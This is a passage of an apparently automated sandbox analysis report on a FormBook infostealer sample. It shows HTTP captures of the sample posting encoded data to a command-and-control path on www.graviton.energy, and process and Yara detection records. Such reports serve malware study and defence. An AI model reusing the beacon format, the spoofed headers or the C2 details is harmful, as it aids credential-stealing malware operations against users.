                                                                                                    Dec 3, 2024 14:17:34.857074022 CET1236INData Raw: 3d 22 20 22 29 7b 62 3d 62 2e 73 75 62 73 74 72 28 31 2c 62 2e 6c 65 6e 67 74 68 29 7d 76 61 72 20 67 3d 62 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 62 2e 69 6e 64 65 78 4f 66 28 22 3d 22 29 29 3b 69 66 28 62 2e 69 6e 64 65 78 4f 66 28 22 3b 22 29
                                                                                                    Data Ascii: =" "){b=b.substr(1,b.length)}var g=b.substring(0,b.indexOf("="));if(b.indexOf(";")!=-1){var c=b.substring(b.indexOf("=")+1,b.indexOf(";"))}else{var c=b.substr(b.indexOf("=")+1,b.length)}if(h==g){f=c}var e=b.indexOf(";")+1;if(e==0){e=b.length}b
                                                                                                    Dec 3, 2024 14:17:34.857085943 CET1236INData Raw: 22 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 67 70 70 5f 70 69 6e 67 28 29 7d 65 6c 73 65 7b 69 66 28 67 3d 3d 3d 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 29 7b 5f 5f 67 70 70 2e 65 3d 5f 5f 67 70 70 2e 65 7c 7c 5b
                                                                                                    Data Ascii: "){return window.cmp_gpp_ping()}else{if(g==="addEventListener"){__gpp.e=__gpp.e||[];if(!("lastId" in __gpp)){__gpp.lastId=0}__gpp.lastId++;var c=__gpp.lastId;__gpp.e.push({id:c,callback:f});return{eventName:"listenerRegistered",listenerId:c,da
                                                                                                    Dec 3, 2024 14:17:34.857176065 CET1236INData Raw: 6f 6d 6d 61 6e 64 2c 62 2e 76 65 72 73 69 6f 6e 2c 66 75 6e 63 74 69 6f 6e 28 68 2c 67 29 7b 76 61 72 20 65 3d 7b 5f 5f 75 73 70 61 70 69 52 65 74 75 72 6e 3a 7b 72 65 74 75 72 6e 56 61 6c 75 65 3a 68 2c 73 75 63 63 65 73 73 3a 67 2c 63 61 6c 6c
                                                                                                    Data Ascii: ommand,b.version,function(h,g){var e={__uspapiReturn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")})}if(typeof(c)==="object"&&c!==null&&"__tcfapiCall" in c){var b=c.__tcfapiCall;window.__tcfapi(b.co
                                                                                                    Dec 3, 2024 14:17:34.932792902 CET1236INData Raw: 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 65 73 73 61 67 65 22 2c 77 69 6e 64 6f 77 2e 63 6d 70 5f 6d 73 67 68 61 6e 64 6c 65 72 2c 66 61 6c 73 65 29 7d 7d 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f 61 64 64 46 72 61 6d 65 28 22 5f 5f 63 6d 70 4c
                                                                                                    Data Ascii: EventListener("message",window.cmp_msghandler,false)}};window.cmp_addFrame("__cmpLocator");if(!("cmp_disableusp" in window)||!window.cmp_disableusp){window.cmp_addFrame("__uspapiLocator")}if(!("cmp_disabletcf" in window)||!window.cmp_disabletc


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    25192.168.2.849738185.101.158.113805268C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Dec 3, 2024 14:17:40.878516912 CET823OUTPOST /y54z/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.graviton.energy
                                                                                                    Origin: http://www.graviton.energy
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 207
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.graviton.energy/y54z/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Raw: 31 4a 67 48 6b 6c 3d 6c 6f 37 61 6c 6f 35 6d 63 38 4c 50 6c 39 39 63 39 47 56 44 2f 72 4f 71 73 7a 78 49 68 31 45 53 76 46 33 6b 54 78 33 4b 6e 47 49 65 51 79 35 63 66 4d 66 35 5a 56 2b 6c 52 2b 72 6c 48 43 4a 74 53 79 34 6b 72 2f 43 49 65 4f 64 48 77 43 42 30 77 47 4e 58 56 4f 64 6d 76 47 2b 41 30 7a 33 64 43 50 59 44 5a 6d 31 6c 72 44 6d 76 4e 73 47 59 6a 6b 58 79 66 6f 32 33 76 48 4b 7a 76 55 30 69 54 6e 46 39 68 70 70 68 72 42 63 63 44 79 53 53 65 35 34 70 31 4a 45 37 69 52 70 64 37 6c 34 48 2b 4b 73 33 75 62 39 67 34 55 70 4c 71 42 4d 39 31 63 2b 6e 67 4d 4f 4a 70 74 54 48 68 45 4e 61 79 49 4e 54 51 41 41 3d
                                                                                                    Data Ascii: 1JgHkl=lo7alo5mc8LPl99c9GVD/rOqszxIh1ESvF3kTx3KnGIeQy5cfMf5ZV+lR+rlHCJtSy4kr/CIeOdHwCB0wGNXVOdmvG+A0z3dCPYDZm1lrDmvNsGYjkXyfo23vHKzvU0iTnF9hpphrBccDySSe54p1JE7iRpd7l4H+Ks3ub9g4UpLqBM91c+ngMOJptTHhENayINTQAA=
                                                                                                    Dec 3, 2024 14:17:42.175770044 CET1150INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Cache-Control: no-cache, private
                                                                                                    Date: Tue, 03 Dec 2024 13:17:41 GMT
                                                                                                    Content-Encoding: gzip
                                                                                                    Data Raw: 33 39 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 dd 6e db 36 14 be ef 53 b0 ea 6d 29 46 c9 10 34 85 14 a0 48 8b 76 c0 86 ed 62 43 bb ab 81 a2 8e 25 da 14 a9 91 b4 2d f7 8d f6 1a 7b b2 1d 92 92 23 27 c6 92 76 06 0c 81 e2 39 df 77 fe 8f ca 97 ef 7f b9 fb ed 8f 5f 3f 90 ce f7 ea f6 45 19 1e 64 ec 95 76 55 d6 79 3f bc 65 6c bf df e7 fb ab dc d8 96 15 37 37 37 6c 0c 32 19 51 5c b7 55 d6 40 16 c4 df 1e 4f 01 03 78 73 fb 82 e0 af 54 52 6f 88 05 55 65 ce 1f 14 b8 0e c0 67 a4 b3 b0 3a 81 6f 2d df 49 6f 74 0e 1a 6c 7b 60 c2 39 c6 87 21 c7 67 36 21 39 61 e5 e0 89 3f 0c 50 65 1e 46 cf d6 7c c7 d3 db 8c 38 2b fe 13 70 9d f0 d6 08 57 b2 a4 34 e1 7a e9 15 dc 7e 92 60 09 68 ef 3c 74 9e 80 d4 40 34 6c 81 7c 86 da 49 0f 2f 4b 96 e4 92 57 3d 78 4e 44 c7 ad 03 5f 65 5b bf a2 6f 32 c2 26 c0 78 19 42 47 e1 af ad dc 55 d9 17 fa fb 3b 7a 67 fa 81 7b 59 2b 8c 97 30 da 23 57 95 fd f8 a1 82 a6 c5 37 27 ba 9a f7 e8 a2 35 b5 f1 6e 21 ac 8d d4 0d 8c 73 3c 22 4d 12 dd 49 d8 0f c6 62 60 8f c8 7b d9 f8 ae 6a 60 27 05 d0 78 78 4d [TRUNCATED]
                                                                                                    Data Ascii: 39aVn6Sm)F4HvbC%-{#'v9w_?EdvUy?el777l2Q\U@OxsTRoUeg:o-Iotl{`9!g6!9a?PeF|8+pW4z~`h<t@4l|I/KW=xND_e[o2&xBGU;zg{Y+0#W7'5n!s<"MIb`{j`'xxM^rE$9,<~#}c/]Qo6VXE'{dy9-knzhJXpN AKdh#b3xu4qq=8'+p!U= =w){OVChWJ:HaQV*1oj%MtX{5{6A8z@x,6x#wD(I;c.nz.u:88N't\3{]S{3]"*, O-)rAyC-p&8%m* vkmtKrf){UEjh"=n[Gjk2>%d9[\]>2DtvdhllwxZiNu2+aam|E./.xMft@1vb_}p0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    26192.168.2.849739185.101.158.113805268C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Dec 3, 2024 14:17:43.540066004 CET843OUTPOST /y54z/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.graviton.energy
                                                                                                    Origin: http://www.graviton.energy
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 227
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.graviton.energy/y54z/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Raw: 31 4a 67 48 6b 6c 3d 6c 6f 37 61 6c 6f 35 6d 63 38 4c 50 2f 64 4e 63 38 6e 56 44 35 4c 4f 70 76 7a 78 49 72 56 45 57 76 46 7a 6b 54 7a 48 61 6e 51 77 65 51 54 4a 63 65 4a 6a 35 65 56 2b 6c 61 65 71 76 49 69 4a 79 53 79 45 61 72 39 57 49 65 4f 4a 48 77 48 6c 30 78 31 56 57 55 65 64 6f 6b 6d 2b 43 70 6a 33 64 43 50 59 44 5a 6c 4a 66 72 43 4f 76 4e 64 57 59 67 46 58 74 42 34 32 6f 34 33 4b 7a 72 55 31 70 54 6e 46 44 68 6f 46 48 72 48 59 63 44 7a 69 53 65 73 4d 71 37 4a 45 35 74 78 70 4c 79 58 68 50 2b 39 73 62 7a 6f 52 69 37 33 70 59 6d 58 39 58 76 2b 32 68 6a 4d 6d 69 70 75 37 78 6b 7a 51 79 6f 72 64 6a 4f 58 56 31 49 38 32 39 63 51 44 43 73 46 59 38 2f 4a 43 50 52 76 69 71
                                                                                                    Data Ascii: 1JgHkl=lo7alo5mc8LP/dNc8nVD5LOpvzxIrVEWvFzkTzHanQweQTJceJj5eV+laeqvIiJySyEar9WIeOJHwHl0x1VWUedokm+Cpj3dCPYDZlJfrCOvNdWYgFXtB42o43KzrU1pTnFDhoFHrHYcDziSesMq7JE5txpLyXhP+9sbzoRi73pYmX9Xv+2hjMmipu7xkzQyordjOXV1I829cQDCsFY8/JCPRviq
                                                                                                    Dec 3, 2024 14:17:44.847474098 CET1150INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Cache-Control: no-cache, private
                                                                                                    Date: Tue, 03 Dec 2024 13:17:44 GMT
                                                                                                    Content-Encoding: gzip
                                                                                                    Data Raw: 33 39 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 dd 6e db 36 14 be ef 53 b0 ea 6d 29 46 c9 10 34 85 14 a0 48 8b 76 c0 86 ed 62 43 bb ab 81 a2 8e 25 da 14 a9 91 b4 2d f7 8d f6 1a 7b b2 1d 92 92 23 27 c6 92 76 06 0c 81 e2 39 df 77 fe 8f ca 97 ef 7f b9 fb ed 8f 5f 3f 90 ce f7 ea f6 45 19 1e 64 ec 95 76 55 d6 79 3f bc 65 6c bf df e7 fb ab dc d8 96 15 37 37 37 6c 0c 32 19 51 5c b7 55 d6 40 16 c4 df 1e 4f 01 03 78 73 fb 82 e0 af 54 52 6f 88 05 55 65 ce 1f 14 b8 0e c0 67 a4 b3 b0 3a 81 6f 2d df 49 6f 74 0e 1a 6c 7b 60 c2 39 c6 87 21 c7 67 36 21 39 61 e5 e0 89 3f 0c 50 65 1e 46 cf d6 7c c7 d3 db 8c 38 2b fe 13 70 9d f0 d6 08 57 b2 a4 34 e1 7a e9 15 dc 7e 92 60 09 68 ef 3c 74 9e 80 d4 40 34 6c 81 7c 86 da 49 0f 2f 4b 96 e4 92 57 3d 78 4e 44 c7 ad 03 5f 65 5b bf a2 6f 32 c2 26 c0 78 19 42 47 e1 af ad dc 55 d9 17 fa fb 3b 7a 67 fa 81 7b 59 2b 8c 97 30 da 23 57 95 fd f8 a1 82 a6 c5 37 27 ba 9a f7 e8 a2 35 b5 f1 6e 21 ac 8d d4 0d 8c 73 3c 22 4d 12 dd 49 d8 0f c6 62 60 8f c8 7b d9 f8 ae 6a 60 27 05 d0 78 78 4d [TRUNCATED]
                                                                                                    Data Ascii: 39aVn6Sm)F4HvbC%-{#'v9w_?EdvUy?el777l2Q\U@OxsTRoUeg:o-Iotl{`9!g6!9a?PeF|8+pW4z~`h<t@4l|I/KW=xND_e[o2&xBGU;zg{Y+0#W7'5n!s<"MIb`{j`'xxM^rE$9,<~#}c/]Qo6VXE'{dy9-knzhJXpN AKdh#b3xu4qq=8'+p!U= =w){OVChWJ:HaQV*1oj%MtX{5{6A8z@x,6x#wD(I;c.nz.u:88N't\3{]S{3]"*, O-)rAyC-p&8%m* vkmtKrf){UEjh"=n[Gjk2>%d9[\]>2DtvdhllwxZiNu2+aam|E./.xMft@1vb_}p0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    27192.168.2.849740185.101.158.113805268C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Dec 3, 2024 14:17:46.210248947 CET1860OUTPOST /y54z/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.graviton.energy
                                                                                                    Origin: http://www.graviton.energy
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 1243
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.graviton.energy/y54z/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Raw: 31 4a 67 48 6b 6c 3d 6c 6f 37 61 6c 6f 35 6d 63 38 4c 50 2f 64 4e 63 38 6e 56 44 35 4c 4f 70 76 7a 78 49 72 56 45 57 76 46 7a 6b 54 7a 48 61 6e 51 34 65 51 42 42 63 59 75 33 35 66 56 2b 6c 5a 65 71 75 49 69 4a 2f 53 79 73 65 72 39 62 31 65 4d 78 48 79 68 70 30 35 67 35 57 42 4f 64 6f 72 47 2b 44 30 7a 32 64 43 50 49 48 5a 6c 5a 66 72 43 4f 76 4e 66 2b 59 30 6b 58 74 44 34 32 33 76 48 4b 6e 76 55 30 4f 54 6e 73 34 68 6f 78 78 72 33 34 63 43 54 79 53 59 65 6b 71 7a 4a 45 6e 68 52 6f 49 79 58 64 41 2b 37 49 78 7a 70 6c 4d 37 33 68 59 6c 6a 55 62 33 2b 43 57 6e 4b 79 43 73 63 4b 52 67 43 51 4b 74 4b 52 50 45 33 42 54 63 73 69 4b 61 6a 36 49 35 6d 31 6c 6a 4e 75 61 64 66 50 38 4f 67 58 72 7a 56 6d 61 61 4b 68 2f 37 68 49 5a 74 34 77 50 47 52 59 43 43 56 4d 4d 58 55 66 35 75 59 50 4e 4f 70 52 53 48 4b 59 45 35 4b 2b 38 71 56 4a 4f 58 52 4d 47 6f 46 53 47 4c 32 4a 33 4e 67 46 69 39 4a 45 6a 36 6c 4a 2b 66 35 4f 57 4b 4c 33 67 39 6f 59 64 69 7a 77 38 35 72 51 66 37 71 37 59 39 43 64 56 52 42 45 31 5a 45 73 [TRUNCATED]
                                                                                                    Data Ascii: 1JgHkl=lo7alo5mc8LP/dNc8nVD5LOpvzxIrVEWvFzkTzHanQ4eQBBcYu35fV+lZequIiJ/Syser9b1eMxHyhp05g5WBOdorG+D0z2dCPIHZlZfrCOvNf+Y0kXtD423vHKnvU0OTns4hoxxr34cCTySYekqzJEnhRoIyXdA+7IxzplM73hYljUb3+CWnKyCscKRgCQKtKRPE3BTcsiKaj6I5m1ljNuadfP8OgXrzVmaaKh/7hIZt4wPGRYCCVMMXUf5uYPNOpRSHKYE5K+8qVJOXRMGoFSGL2J3NgFi9JEj6lJ+f5OWKL3g9oYdizw85rQf7q7Y9CdVRBE1ZEsBPP/syzf4lG2oHwTuYGl7STm59Xm3+5fqhAqeeZm1Unf+ZKgWmonEv1v//bcyJc/a4k3FmQk6sr8JxYfGdCtpeMWBFJJdlddoWZdQaZZPKn56laM5GIlntntVI0I4RmxcECNNQHh2cRcqW42x6OoZbf34lyAyxev8kp7HNs08ZYIGKmM10/QfEv2HZWmkAhs7jv5nOzBk0pW2eU2wEsh+2qYFDYxPCxSSR4JVEhEK0rT5xvfjfHDcSekAHgaHGBzGCKbSyL8yYXGhIG1oVSAgg+S3XGT4+rhw9KwDa6OZXEIbbbyCyKV64poMsep3fKBLhMoDwFbi3J4Do+LhjAqzc6P7M/GAZUWVmJiEo2YOKsoPbMni7pdCJxGd+0hPIZjP2RN+ACeRJaq+Sixjs4pqCy8JeQEqSKZBT6sEgIWFq2VEP17tAoA00ECjpk/L1BQA3HgRDkOL2nGof0Py1iWG8IyE/tw+BQ5OD6W8W+l7Q3n9/mBVOAxF7u4eR6rp8JZHozYsh+mZHtHXpAjoD8GJ08a7LJc9A5NFK9hsAJDEj8CL2m3yPUH86OFIV99+ctVFwMi3zlM50eeRxBQ8TuXpOm2nPAhh+0KtUyA/RjP6PQxtEn4IFQtb1uN+VDnPWF5eBm13isUsRqOoSysafZseEIJaH11Del/2G [TRUNCATED]
                                                                                                    Dec 3, 2024 14:17:47.540468931 CET1150INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Cache-Control: no-cache, private
                                                                                                    Date: Tue, 03 Dec 2024 13:17:47 GMT
                                                                                                    Content-Encoding: gzip
                                                                                                    Data Raw: 33 39 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 dd 6e db 36 14 be ef 53 b0 ea 6d 29 46 c9 10 34 85 14 a0 48 8b 76 c0 86 ed 62 43 bb ab 81 a2 8e 25 da 14 a9 91 b4 2d f7 8d f6 1a 7b b2 1d 92 92 23 27 c6 92 76 06 0c 81 e2 39 df 77 fe 8f ca 97 ef 7f b9 fb ed 8f 5f 3f 90 ce f7 ea f6 45 19 1e 64 ec 95 76 55 d6 79 3f bc 65 6c bf df e7 fb ab dc d8 96 15 37 37 37 6c 0c 32 19 51 5c b7 55 d6 40 16 c4 df 1e 4f 01 03 78 73 fb 82 e0 af 54 52 6f 88 05 55 65 ce 1f 14 b8 0e c0 67 a4 b3 b0 3a 81 6f 2d df 49 6f 74 0e 1a 6c 7b 60 c2 39 c6 87 21 c7 67 36 21 39 61 e5 e0 89 3f 0c 50 65 1e 46 cf d6 7c c7 d3 db 8c 38 2b fe 13 70 9d f0 d6 08 57 b2 a4 34 e1 7a e9 15 dc 7e 92 60 09 68 ef 3c 74 9e 80 d4 40 34 6c 81 7c 86 da 49 0f 2f 4b 96 e4 92 57 3d 78 4e 44 c7 ad 03 5f 65 5b bf a2 6f 32 c2 26 c0 78 19 42 47 e1 af ad dc 55 d9 17 fa fb 3b 7a 67 fa 81 7b 59 2b 8c 97 30 da 23 57 95 fd f8 a1 82 a6 c5 37 27 ba 9a f7 e8 a2 35 b5 f1 6e 21 ac 8d d4 0d 8c 73 3c 22 4d 12 dd 49 d8 0f c6 62 60 8f c8 7b d9 f8 ae 6a 60 27 05 d0 78 78 4d [TRUNCATED]
                                                                                                    Data Ascii: 39aVn6Sm)F4HvbC%-{#'v9w_?EdvUy?el777l2Q\U@OxsTRoUeg:o-Iotl{`9!g6!9a?PeF|8+pW4z~`h<t@4l|I/KW=xND_e[o2&xBGU;zg{Y+0#W7'5n!s<"MIb`{j`'xxM^rE$9,<~#}c/]Qo6VXE'{dy9-knzhJXpN AKdh#b3xu4qq=8'+p!U= =w){OVChWJ:HaQV*1oj%MtX{5{6A8z@x,6x#wD(I;c.nz.u:88N't\3{]S{3]"*, O-)rAyC-p&8%m* vkmtKrf){UEjh"=n[Gjk2>%d9[\]>2DtvdhllwxZiNu2+aam|E./.xMft@1vb_}p0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    28192.168.2.849741185.101.158.113805268C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Dec 3, 2024 14:17:48.864129066 CET564OUTGET /y54z/?1JgHkl=oqT6mesMFtjVx9Zo+WJYx+2EviEW1FInvVPBS1/+zHYUGg1LXtrFdHCKa7buL2o/Gnc6meWbbP401AFPslg2ZPd0sXm+50uRZ80dRU59tTW2JoKfzEPgRpmu9XiZqkNmHw==&uZ9=wvL0WTq0tnld4P HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Host: www.graviton.energy
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Dec 3, 2024 14:17:50.259577990 CET1236INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Cache-Control: no-cache, private
                                                                                                    Date: Tue, 03 Dec 2024 13:17:50 GMT
                                                                                                    Data Raw: 39 37 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 64 65 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 61 76 69 74 6f 6e 2e 65 6e 65 72 67 79 2f 63 73 73 2f 61 70 70 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 61 76 69 74 6f 6e 2e 65 6e 65 72 67 79 2f 6a 73 2f 61 70 70 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 69 65 72 20 65 6e 74 73 74 65 68 74 20 65 69 6e 65 20 6e 65 75 65 20 57 65 62 73 69 74 65 21 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e [TRUNCATED]
                                                                                                    Data Ascii: 970<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" lang="de" xml:lang="de"><head> <link rel="stylesheet" href="http://www.graviton.energy/css/app.css"> <script type="text/javascript" src="http://www.graviton.energy/js/app.js"></script> <title>Hier entsteht eine neue Website!</title> <meta charset="utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta name="robots" content="noindex"> <meta name="viewport" content="width=device-width, initial-scale=1" /> <link rel="stylesheet" href="https://use.typekit.net/bag0psx.css" /> <meta name="csrf-token" content=""> <link rel="prefetch" as="image" href="http://www.graviton.energy/../images/bg-landing-page.jpg" /> <link rel="apple-touch-icon" sizes="180x180" href="http://www.graviton.energy/images/favicons/apple-touch-icon.png"> <link rel="icon" type="image/png" sizes="32x32" href="http://www.graviton.energy/images/favicons/favicon-32x32.png"> <link rel="icon" type="image/png" [TRUNCATED]
                                                                                                    Dec 3, 2024 14:17:50.259618998 CET1236INData Raw: 67 72 61 76 69 74 6f 6e 2e 65 6e 65 72 67 79 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 6e 69 66 65 73 74 22 20 68 72 65 66 3d
                                                                                                    Data Ascii: graviton.energy/images/favicons/favicon-16x16.png"> <link rel="manifest" href="http://www.graviton.energy/images/favicons/manifest.json"> <link rel="mask-icon" href="http://www.graviton.energy/images/favicons/safari-pinned-tab.svg" col
                                                                                                    Dec 3, 2024 14:17:50.259629011 CET148INData Raw: 2d 73 6d 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 70 79 72 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 c2 a9 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 34 2c 20 68 6f 73 74 74 65 63 68 20 47 6d 62 48
                                                                                                    Data Ascii: -sm"> <div class="copyright"> Copyright 2024, hosttech GmbH </div> </div></footer></div></body></html>0


                                                                                                    Click to jump to process

                                                                                                    Click to jump to process

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Click to jump to process

                                                                                                    Target ID:0
                                                                                                    Start time:08:14:42
                                                                                                    Start date:03/12/2024
                                                                                                    Path:C:\Users\user\Desktop\72STaC6BmljfbIQ.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\72STaC6BmljfbIQ.exe"
                                                                                                    Imagebase:0x3d0000
                                                                                                    File size:765'952 bytes
                                                                                                    MD5 hash:A8058BB3809176BC3EE9E52DF4960F87
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:4
                                                                                                    Start time:08:14:58
                                                                                                    Start date:03/12/2024
                                                                                                    Path:C:\Users\user\Desktop\72STaC6BmljfbIQ.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Users\user\Desktop\72STaC6BmljfbIQ.exe"
                                                                                                    Imagebase:0x270000
                                                                                                    File size:765'952 bytes
                                                                                                    MD5 hash:A8058BB3809176BC3EE9E52DF4960F87
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:5
                                                                                                    Start time:08:14:58
                                                                                                    Start date:03/12/2024
                                                                                                    Path:C:\Users\user\Desktop\72STaC6BmljfbIQ.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Users\user\Desktop\72STaC6BmljfbIQ.exe"
                                                                                                    Imagebase:0x2e0000
                                                                                                    File size:765'952 bytes
                                                                                                    MD5 hash:A8058BB3809176BC3EE9E52DF4960F87
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:6
                                                                                                    Start time:08:14:58
                                                                                                    Start date:03/12/2024
                                                                                                    Path:C:\Users\user\Desktop\72STaC6BmljfbIQ.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\72STaC6BmljfbIQ.exe"
                                                                                                    Imagebase:0x5f0000
                                                                                                    File size:765'952 bytes
                                                                                                    MD5 hash:A8058BB3809176BC3EE9E52DF4960F87
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1924713892.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1924159868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1926555511.00000000014A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:7
                                                                                                    Start time:08:15:27
